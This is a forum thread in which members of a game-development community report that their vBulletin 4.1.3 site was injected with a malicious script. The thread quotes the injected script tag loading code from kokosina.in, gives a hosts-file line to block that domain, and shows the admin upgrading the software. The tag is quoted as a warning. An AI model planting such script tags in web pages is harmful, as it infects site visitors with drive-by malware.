Visited the homepage, and got a series of redirects through a bunch of sites without me doing anything, and I discovered a very suspicious script in the html for the home page:

<script type="text/javascript" src="http :// kokosina.in/1"></script>

It's near the bottom. It is obfuscated, so likely malicious. Checking my system out now to see if I received an unwelcome drive-by install.

I'm getting a warning from Chrome about PGD having some malicious code every now and again.

https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This

Just noticed that PGD is still running the highly exploitable 4.1.3 version of VB.

You guys have GOT to keep this thing updated, or people are going to get infected all the time.

avast always comes up with a warning when I open pgd

kokosina.in/1

Yep, that's it. Read the thread on the vbulletin.com site I posted above; it's a widespread problem, and it can be a very nasty infection for users if they don't have updated software/AV.

Well, no malicious stuff installed on my system, but it's just a matter of time with that injection hole sitting there.

I'll be in the chat room if anyone needs more info. Not going to keep refreshing the page here since I have to do so with AV off.

We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.

Hopefully such attacks will become less likely once we've moved to a much more secure host.

We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.

Hopefully such attacks will become less likely once we've moved to a much more secure host.
Only if your host is the one taking care of forum software updates, lol.

WILL, you REALLY need to fix this ASAP. Your site is attacking your users *right now*. It's not a cosmetic issue; there's a malicious piece of code that your site is serving to your users every time they load the page. That forum thread on vBulletin.com tells you how to fix it.

If it were me, I would shut down the board until it is fixed.

Just FYI, I would suggest to everyone to blackhole the kokosina.in domain if you continue using this forum until it is fixed. (add the following line to your hosts file in the C:\windows\system32\drivers\etc directory:

127.0.0.1 kokosina.in

Note that this doesn't make browsing the site more secure, it just addresses the current hack. They can change it at any time to point somewhere else. You continue using the forum at your own risk.

That, or use Firefox ad NoScript extension :)

Yep. That will work, too, for those who use FireFox, anyway. :)

I'm looking into the fix now. If all goes well it'll be back up and working at least by tomorrow.

Well that wasn't so bad. And it looks like they made a few improvements in the upgrade from 4.1.3 to 4.1.9. Also I've gone and added reCAPTCHA to the registration system to help prevent bots from spamming us so much. I really do hope that helps.

Anyhow enjoy your attack-free site! ;)

BTW if I missed something (refresh the site cache to make sure!!!) please let me know. I know this sucks for Windows users as you get all kinds of crap sent to attack your systems and do nasty things to it so I will be looking closely at this over the next few days or so. Also I've asked AthenaOfDelphi to add the attacking script to be blocked via htaccess as well just to be sure.

You guys - I hate to re-mention this but you could just move over to linux :) it might not be entirely net attack proof but at least you can rest easy knowing that no virus or windows virus based attacks would work. Combine that with firefox and noscript as well as noflash and adblock and your pretty much golden.

You guys - I hate to re-mention this but you could just move over to linux :)
You can also downgrade your Windows to version 3.1, where no modern virus will work or even better, shut down your computer entirely, after which you won't be vulnerable to any kind of computer attacks. ;)

Seriously though, this is why for Afterwarp site we have moved away from vBulletin, for more than a year they did nothing to fight spam (PGD uses same techniques we've been using in vBulletin 3 for years), made their prices ridiculously high and even though you own permanent license they constantly nag you to renew, sometimes with death letters. Now this vulnerability has shown that vBulletin is poorly designed so that it technically allows these type of hacks. I would never use vBulletin again. :(

The irony behind vBulletin:

Server running free software, for the free and open source community running on free and open standards on PHP, the technology powering the freedom of the modern web...

Thanks, Will, I appreciate it very much. :)

As for switching to Linux.. I would if they could ever decide on a desktop UI standard that actually didn't suck. Same with a Windows environment where I could still run the 90%+ of software that I need for work. Also if they could get more hardware manufacturers to write drivers for most of the hardware I use, rather than not being able to use it.

Don't get me wrong, I use and support Linux on my webservers to do the heavy-lifting on the 'net, but the day-to-day user experience just sucks sweaty donkey balls. It IS a lot better than it was, and it is getting better over time, but it's still not there to the point I need it to be in order to switch.